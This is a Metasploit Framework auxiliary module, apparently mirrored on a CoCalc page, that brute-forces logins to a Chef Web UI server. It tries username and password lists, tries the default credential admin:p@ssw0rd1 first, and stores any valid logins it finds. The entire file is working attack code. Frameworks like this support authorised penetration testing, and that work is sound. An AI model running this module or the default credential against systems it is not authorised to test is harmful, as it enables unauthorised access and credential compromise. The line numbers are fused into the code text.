CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/http/chef_webui_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/login_scanner/chef_webui'6require 'metasploit/framework/credential_collection'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::HttpClient10include Msf::Auxiliary::AuthBrute11include Msf::Auxiliary::Report12include Msf::Auxiliary::Scanner1314def initialize15super(16'Name' => 'Chef Web UI Brute Force Utility',17'Description' => %q{18This module attempts to login to Chef Web UI server instance using username and password19combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It20will also test for the default login (admin:p@ssw0rd1).21},22'Author' =>23[24'hdm'25],26'License' => MSF_LICENSE,27'DefaultOptions' =>28{29'SSL' => true,30}31)3233register_options(34[35Opt::RPORT(443),36OptString.new('USERNAME', [false, 'The username to specify for authentication', '']),37OptString.new('PASSWORD', [false, 'The password to specify for authentication', '']),38OptString.new('TARGETURI', [ true, 'The path to the Chef Web UI application', '/']),39])40end4142#43# main44#45def run_host(ip)46init_loginscanner(ip)47msg = @scanner.check_setup48if msg49print_brute :level => :error, :ip => rhost, :msg => msg50return51end5253print_brute :level=>:status, :ip=>rhost, :msg=>("Found Chef Web UI application at #{datastore['TARGETURI']}")54bruteforce(ip)55end5657def bruteforce(ip)58@scanner.scan! do |result|59case result.status60when Metasploit::Model::Login::Status::SUCCESSFUL61print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"62do_report(ip, rport, result)63:next_user64when Metasploit::Model::Login::Status::DENIED_ACCESS65print_brute :level => :status, :ip => ip, :msg => "Correct credentials, but unable to login: '#{result.credential}'"66do_report(ip, rport, result)67:next_user68when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT69if datastore['VERBOSE']70print_brute :level => :verror, :ip => ip, :msg => "Could not connect"71end72invalidate_login(73address: ip,74port: rport,75protocol: 'tcp',76public: result.credential.public,77private: result.credential.private,78realm_key: result.credential.realm_key,79realm_value: result.credential.realm,80status: result.status81)82:abort83when Metasploit::Model::Login::Status::INCORRECT84if datastore['VERBOSE']85print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"86end87invalidate_login(88address: ip,89port: rport,90protocol: 'tcp',91public: result.credential.public,92private: result.credential.private,93realm_key: result.credential.realm_key,94realm_value: result.credential.realm,95status: result.status96)97end98end99end100101def do_report(ip, port, result)102service_data = {103address: ip,104port: port,105service_name: 'http',106protocol: 'tcp',107workspace_id: myworkspace_id108}109110credential_data = {111module_fullname: self.fullname,112origin_type: :service,113private_data: result.credential.private,114private_type: :password,115username: result.credential.public,116}.merge(service_data)117118credential_core = create_credential(credential_data)119120login_data = {121core: credential_core,122last_attempted_at: DateTime.now,123status: result.status124}.merge(service_data)125126create_credential_login(login_data)127end128129def init_loginscanner(ip)130@cred_collection = build_credential_collection(131username: datastore['USERNAME'],132password: datastore['PASSWORD']133)134135# Always try the default first136@cred_collection.prepend_cred(137Metasploit::Framework::Credential.new(public: 'admin', private: 'p@ssw0rd1')138)139140@scanner = Metasploit::Framework::LoginScanner::ChefWebUI.new(141configure_http_login_scanner(142uri: datastore['TARGETURI'],143cred_details: @cred_collection,144stop_on_success: datastore['STOP_ON_SUCCESS'],145bruteforce_speed: datastore['BRUTEFORCE_SPEED'],146connection_timeout: 5,147http_username: datastore['HttpUsername'],148http_password: datastore['HttpPassword']149)150)151end152end153154155